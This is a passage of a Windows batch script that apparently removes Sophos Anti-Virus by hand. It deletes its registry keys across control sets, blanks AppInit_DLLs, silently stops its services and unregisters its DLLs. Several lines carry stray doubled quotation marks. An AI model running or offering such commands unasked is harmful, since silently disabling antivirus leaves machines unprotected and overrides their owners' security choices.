echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG
REM === ControlSet001 ===
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG
REM === ControlSet002 ===
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG
REM === Remote Update Reg Entries ===
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Update] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Remote Update] >> %TEMP%\SOTMP.REG
REM === BOPS ===
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] >> %TEMP%\SOTMP.REG
echo "AppInit_DLLs"=%nulvar% >> %TEMP%\SOTMP.REG
REM ==== AppInit_DLLs BACKUP ====
REGEDIT /E %temp%\AppInit_BAK.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"
REM === Remove InProgress (Suspended Installers)
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Inprogress] >> %TEMP%\SOTMP.REG
REM === SAU COM Objects Removal ===
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ALUpdNotification] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ALUpdNotification.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ClientUpdate] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ClientUpdate.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ConnectionListener] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ConnectionListener.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.PropertiesDialog] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.PropertiesDialog.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.UpdateNotification2] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.UpdateNotification2.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_CLASSES_ROOT\Interface\{1474930F-6D2F-42E1-A604-958E2A287D32}] >> %TEMP%\SOTMP.REG
echo [-HKEY_CLASSES_ROOT\Interface\{1E4DEB88-3386-4E80-A7D1-9997C39A570D}] >> %TEMP%\SOTMP.REG
echo [-HKEY_CLASSES_ROOT\Interface\{4629634A-1AF8-4E02-B5A2-0273FE770C74}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C7CA525-1016-4C70-A116-7AA4FE0DAF97}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5272D27B-11B1-4687-85FC-21B6214E554A}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7CBCADE4-7AA7-43AE-BD20-D88223B6353E}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CBF57A6D-243A-4FE7-B9FA-22A67B4D056B}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF20AFAB-E530-4277-A2EB-A9051D7E3435}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BBA960BE-6A97-4996-9ECB-AA313BEBF37A}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\ALsvc.exe] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{037F2C54-40E9-437E-B8EA-487AEB148A4B}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{5272D27B-11B1-4687-85FC-21B6214E554A}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{66241874-FF4F-47FA-9A47-59BE901FFCC2}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CFC5C7CA-DA4C-4CFB-B16A-65193004E9C2}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1474930F-6D2F-42E1-A604-958E2A287D32}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1E4DEB88-3386-4E80-A7D1-9997C39A570D}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{4629634A-1AF8-4E02-B5A2-0273FE770C74}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BDC72FC6-3EEE-49D8-8D37-5D3655A704FC}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{CE94B62D-25F3-4430-AA85-A22C2888EE65}] >> %TEMP%\SOTMP.REG
REM ==============================================================================================================
ECHO.
ECHO Stopping Sophos Services...
net stop "Sophos Agent" >NUL 2> NUL
net stop "Sophos Anti-Virus" >NUL 2> NUL
net stop "Sophos Anti-Virus status reporter" >NUL 2> NUL
net stop "Sophos AutoUpdate Service" >NUL 2> NUL
net stop "Sophos Message Router" > NUL 2> NUL
net stop sweepupdate > NUL 2> NUL
net stop sweepnet > NUL 2> NUL
net stop "Sophos Cache Manager" > NUL 2> NUL
ECHO Completed.
ECHO.
ECHO Unregistering Sophos DLLs...
REM === Sophos Anti-Virus DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\BackgroundScanClient.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVCleanupService.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavMain.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavProgress.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\AuthorisedLists.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\BackgroundScanning.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Categories.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ComponentManager.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Configuration.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\DesktopMessaging.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\detoured.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\DriveProcessor.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\EEConsumer.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\FilterProcessors.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\FSDecomposer.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICAdapter.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICManagement.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICProcessors.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\LegacyConsumers.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Localisation.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Logging.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\msvcp71.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\msvcr71.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\osdp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Persistance.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavAdapter.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVI.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVI0.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVMSCM.dll"
